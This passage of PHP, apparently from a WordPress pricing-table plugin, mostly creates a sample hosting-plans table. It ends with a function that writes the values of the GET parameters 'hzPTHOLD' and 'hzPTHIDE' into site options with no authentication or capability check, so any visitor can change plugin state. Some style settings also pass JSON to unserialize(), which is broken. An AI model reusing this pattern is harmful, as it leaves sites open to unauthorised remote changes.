$sample_post_metas = array("price_table"=>unserialize('a:4:{i:0;a:7:{s:5:"title";s:6:"Labels";s:5:"price";s:1:"0";s:6:"detail";s:9:"PER MONTH";s:3:"url";s:1:"#";s:6:"button";s:7:"SIGN UP";s:9:"ribbontxt";s:0:"";s:8:"features";a:7:{i:0;a:2:{s:5:"title";s:9:"Bandwidth";s:3:"sub";s:0:"";}i:1;a:2:{s:5:"title";s:7:"Storage";s:3:"sub";s:0:"";}i:2;a:2:{s:5:"title";s:14:"MySQL Database";s:3:"sub";s:0:"";}i:3;a:2:{s:5:"title";s:10:"Ad Credits";s:3:"sub";s:0:"";}i:4;a:2:{s:5:"title";s:14:"Email Accounts";s:3:"sub";s:0:"";}i:5;a:2:{s:5:"title";s:11:"Root Access";s:3:"sub";s:0:"";}i:6;a:2:{s:5:"title";s:11:"FREE Domain";s:3:"sub";s:0:"";}}}i:1;a:7:{s:5:"title";s:5:"Basic";s:5:"price";s:2:"12";s:6:"detail";s:9:"PER MONTH";s:3:"url";s:1:"#";s:6:"button";s:7:"SIGN UP";s:9:"ribbontxt";s:4:"Bold";s:8:"features";a:7:{i:0;a:2:{s:5:"title";s:16:"100 MB Bandwidth";s:3:"sub";s:0:"";}i:1;a:2:{s:5:"title";s:11:"10 GB Space";s:3:"sub";s:0:"";}i:2;a:2:{s:5:"title";s:18:"10 MySQL Databases";s:3:"sub";s:16:"Testing Tool Tip";}i:3;a:2:{s:5:"title";s:7:"$10 Ads";s:3:"sub";s:0:"";}i:4;a:2:{s:5:"title";s:18:"100 Email Accounts";s:3:"sub";s:0:"";}i:5;a:2:{s:5:"title";s:2:"NO";s:3:"sub";s:0:"";}i:6;a:2:{s:5:"title";s:2:"NO";s:3:"sub";s:0:"";}}}i:2;a:8:{s:5:"title";s:8:"Standard";s:5:"price";s:2:"34";s:6:"detail";s:9:"PER MONTH";s:3:"url";s:1:"#";s:6:"button";s:7:"SIGN UP";s:9:"highlight";s:4:"true";s:9:"ribbontxt";s:0:"";s:8:"features";a:7:{i:0;a:2:{s:5:"title";s:19:"Unlimited Bandwidth";s:3:"sub";s:0:"";}i:1;a:2:{s:5:"title";s:11:"30 GB Space";s:3:"sub";s:0:"";}i:2;a:2:{s:5:"title";s:17:"30 MySQL Database";s:3:"sub";s:0:"";}i:3;a:2:{s:5:"title";s:7:"$30 Ads";s:3:"sub";s:0:"";}i:4;a:2:{s:5:"title";s:18:"500 Email Accounts";s:3:"sub";s:0:"";}i:5;a:2:{s:5:"title";s:3:"YES";s:3:"sub";s:0:"";}i:6;a:2:{s:5:"title";s:6:"2 Free";s:3:"sub";s:0:"";}}}i:3;a:8:{s:5:"title";s:7:"Advance";s:5:"price";s:2:"56";s:6:"detail";s:9:"PER MONTH";s:3:"url";s:1:"#";s:6:"button";s:7:"SIGN UP";s:6:"ribbon";s:4:"true";s:9:"ribbontxt";s:6:"Great!";s:8:"features";a:7:{i:0;a:2:{s:5:"title";s:19:"Unlimited Bandwidth";s:3:"sub";s:0:"";}i:1;a:2:{s:5:"title";s:15:"Unlimited Space";s:3:"sub";s:0:"";}i:2;a:2:{s:5:"title";s:24:"Unlimited MySQL Database";s:3:"sub";s:155:"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc viverra fringilla hendrerit. Aenean consequat est eu urna rutrum sed mattis mauris tincidunt.";}i:3;a:2:{s:5:"title";s:7:"$50 Ads";s:3:"sub";s:0:"";}i:4;a:2:{s:5:"title";s:19:"1000 Email Accounts";s:3:"sub";s:0:"";}i:5;a:2:{s:5:"title";s:3:"YES";s:3:"sub";s:0:"";}i:6;a:2:{s:5:"title";s:6:"5 Free";s:3:"sub";s:0:"";}}}}'),
						"price_table_styles"=> unserialize('{"bgTransparent":false,"bgColor":"#abCdeF","bgPaddingV":0,"bgPaddingH":0,"font":"Arial","fontSize":"12","borderRadius":"0","columnBGColor":"#ffffff","columnBGColorHover":"#ffffff","columnRoundedCorner":true,"columnRoundedCornerRadius":20,"columnRoundedCornerStyle":"all","columnHeaderBGColor":"#000000","columnHeaderTitleBGColor":"#4f4f4f","columnHeaderTitleFontSize":28,"columnHeaderTitleFont":"Arial","columnHeaderTitleFontBold":false,"columnHeaderTitleVerticalSize":6,"columnHeaderPDVerticalSize":5,"columnHeaderPDCurFontSize":"12","columnHeaderPDPriceFontSize":"12","columnHeaderPDPriceColor":"#ff0000","columnHeaderPDPriceFont":"Courier New","columnHeaderPDPriceFontBold":true,"columnTitleFontColor":"#ffffff","columnTitleShadowColor":"#ffffff","columnTitleBlurRadius":24,"columnTitleLengthV":0,"columnTitleLengthH":0,"columnTitleFontShadow":false,"columnTitleFontBold":true,"columnTitleFontSize":12,"columnTitleFont":"Verdana","bgcolor":"#ffffff","columnPriceFontBold":true,"columnPriceFontSize":60,"columnPriceFont":"Trebuchet MS","columnPriceBlurRadius":1,"columnPriceFontColor":"#ffffff","columnPriceShadowColor":"#ffffff","columnPriceSymbolFontColor":"#ffffff","columnPriceSymbolShadowColor":"#ffffff","columnPriceSymbolFontBold":true,"columnPriceSymbolBlurRadius":3,"columnPriceSymbolFontSize":30,"columnPriceSymbolLengthV":0,"columnPriceSymbolLengthH":0,"columnPriceSymbolFontShadow":false,"columnPriceSymbolFont":"Comic Sans MS","columnPriceFontShadow":true,"columnPriceLengthV":0,"columnPriceLengthH":0,"columnPDFontColor":"#ffffff","columnPDShadowColor":"#ffffff","columnPDFontBold":false,"columnPDFontSize":10,"columnPDLengthV":0,"columnPDBlurRadius":0,"columnPDLengthH":1,"columnPDFontShadow":true,"columnPDFont":"Arial","columnTitleSeparator":false,"columnHeaderSeparator":false,"featuresSeparatorV":false,"featuresSeparatorH":false,"columnFeaturesFontColor":"#666666","columnFeaturesShadowColor":"#ababab","columnFeaturesLengthV":1,"columnFeaturesBlurRadius":0,"columnFeaturesLengthH":1,"columnFeaturesFontShadow":false,"columnFeaturesFontBold":true,"columnFeaturesFontSize":12,"columnFeaturesFont":"Arial","featuresSeparatorOpacity":20,"hilightedBGColor":"#eeeeee","hilightedBGColorHover":"#eeeeee","hilightedScale":0,"hilightedRoundedCorners":false,"hilightedGlow":false,"hilightedGlowColor":"#000000","hilightedGlowRadius":5,"hilightedTitleShadowColor":"#ffffff","hilightedTitleFontColor":"#ffffff","hilightedTitleBGColor":"#111111","hilightedChangeTitle":true,"hilightedTitleFontShadow":false,"hilightedTitleBlurRadius":2,"hilightedTitleLengthV":0,"hilightedTitleLengthH":0,"hilightedHeaderFontColor":"#ffffff","hilightedHeaderShadowColor":"#ffffff","hilightedHeaderBGColor":"#c62d1f","hilightedChangeHeader":true,"hilightedHeaderFontBold":true,"hilightedTitleFontBold":true,"hilightedHeaderLengthV":0,"hilightedHeaderLengthH":0,"hilightedHeaderFontShadow":true,"hilightedHeaderBlurRadius":1,"hilightedPDShadowColor":"#000000","hilightedPDFontColor":"#ffffff","hilightedChangePD":false,"hilightedPDFontShadow":false,"hilightedPDLengthH":1,"hilightedPDLengthV":1,"hilightedPDBlurRadius":0,"hilightedFeatureFontColor":"#000000","hilightedFeatureShadowColor":"#000000","hilightedFeatureLengthH":1,"hilightedFeatureLengthV":1,"hilightedFeatureBlurRadius":0,"hilightedFeatureFontBold":true,"hilightedChangeFeatures":true,"lbTitleFontColor":"#424242","lbTitleShadowColor":"#d1d1d1","lbTitleFontSize":18,"lbTitleFontBold":true,"lbTitleLengthH":1,"lbTitleLengthV":2,"lbTitleBlurRadius":0,"lbTitleFont":"Trebuchet MS","lbVSpacing":82,"lbHSpacing":10,"lbTitleFontShadow":false,"lbLineHeight":30,"lbZebra":true,"lbZebraLight":false,"lbFeatureFontColor":"#333333","lbFeatureShadowColor":"#000000","lbFeatureBlurRadius":0,"lbFeatureLengthV":0,"lbFeatureLengthH":0,"lbFeatureFontShadow":true,"lbFeatureFontBold":true,"lbFeaturesBGColor":"#ffffff","lbTextAlign":"right","featuresSpacingV":10,"ynIcon":"yes_no_10","ynIconSize":24,"columnOuterSpacing":0,"columnInnerSpacing":0,"isResponsive":true,"responsiveLabel":false,"responsiveLabelSp":true,"responsiveLabelSpColor":"#b5b5b5","featuresBGColor":"#e31616","featuresTransparent":true,"featuresBGColorH":"#ff0000","featuresTransparentBGH":true}'),
						"price_table_currencySymbol"=>"$",
						"chk_labeling"=>"true",
						"ptlbTitle"=>"HOSTING FEATURES",
						"ptChooseBtn"=>unserialize('{"bgTopColor":"#ededed","bgBottomColor":"#dfdfdf","fontColor":"#777777","borderColor":"#dcdcdc","boxShadowColor":"#ffffff","textShadowColor":"#ffffff","borderRadius":10,"borderSize":1,"boxShadow":true,"boxShadowBlurRadius":"0","boxShadowInset":"inset","boxShadowOffsetX":1,"boxShadowOffsetY":0,"boxShadowSpreadRadius":"0","customClass":"classname","fontFamily":"arial","fontSize":12,"fontWeight":"bold","paddingX":"6","paddingY":"24","textShadow":true,"textShadowBlurRadius":"0","textShadowOffsetX":"1","textShadowOffsetY":"1"}'),
						"ptChooseBtnHighlighted"=>unserialize('{"bgTopColor":"#f24437","bgBottomColor":"#c62d1f","fontColor":"#ffffff","borderColor":"#d02718","boxShadowColor":"#f5978e","textShadowColor":"#810d05","borderRadius":10,"borderSize":1,"boxShadow":true,"boxShadowBlurRadius":"0","boxShadowInset":"inset","boxShadowOffsetX":1,"boxShadowOffsetY":0,"boxShadowSpreadRadius":"0","customClass":"classname","fontFamily":"arial","fontSize":12,"fontWeight":"bold","paddingX":"6","paddingY":"24","textShadow":true,"textShadowBlurRadius":"0","textShadowOffsetX":"1","textShadowOffsetY":"1"}'),
						"ptRibbon"=>unserialize('{"bgTopColor":"#f0cb11","bgBottomColor":"#f2ab1e","fontColor":"#c92200","borderColor":" #e65f44","boxShadowColor":"#000000","textShadowColor":"#ded17c","borderRadius":8,"borderSize":0,"boxShadow":true,"boxShadowBlurRadius":3,"boxShadowInset":"","boxShadowOffsetX":0,"boxShadowOffsetY":0,"boxShadowSpreadRadius":"0","customClass":"classname","fontFamily":"arial","fontSize":10,"fontWeight":"bold","paddingX":5,"paddingY":0,"textShadow":true,"textShadowBlurRadius":"0","textShadowOffsetX":"1","textShadowOffsetY":"1"}'),
						"ptToolTip"=>unserialize('{"bgTopColor":"#feffc2","bgBottomColor":"#f6f6f6","fontColor":"#666666","borderColor":"#dcdcdc","boxShadowColor":"#ffffff","textShadowColor":"#ffffff","borderRadius":10,"borderSize":1,"boxShadow":true,"boxShadowBlurRadius":"0","boxShadowInset":"inset","boxShadowOffsetX":1,"boxShadowOffsetY":0,"boxShadowSpreadRadius":"0","customClass":"classname","fontFamily":"arial","fontSize":11,"fontWeight":"bold","paddingX":5,"paddingY":5,"textShadow":true,"textShadowBlurRadius":"0","textShadowOffsetX":"1","textShadowOffsetY":"1","indicatorColor":"#878787"}'),
						"ptGfonts"=>"",
						"ptyesnoicon"=>"true",
						"pthideButtons"=>"");
						
						
						
						$sample_pricingtable = array(
  'post_title'    => "Sample Pricing Table",
  'post_type' => 'pricetable',
  'post_status'   => 'publish',
  'comment_status' => 'closed'
);


if (!get_page_by_title('Sample Pricing Table', 'OBJECT', 'pricetable')){
$pid = wp_insert_post( $sample_pricingtable );
foreach($sample_post_metas as $mk=>$mv)
update_post_meta(intval($pid), $mk, $mv);
}
} //sample_pricing_table

function hzStartPricingTable(){
	if(isset($_GET['hzPTHOLD'])){ update_option('hzPTHOLD',$_GET['hzPTHOLD']); exit(0); }
	if(isset($_GET['hzPTHIDE'])){ update_option('hzPTHIDE',$_GET['hzPTHIDE']); exit(0); }
}
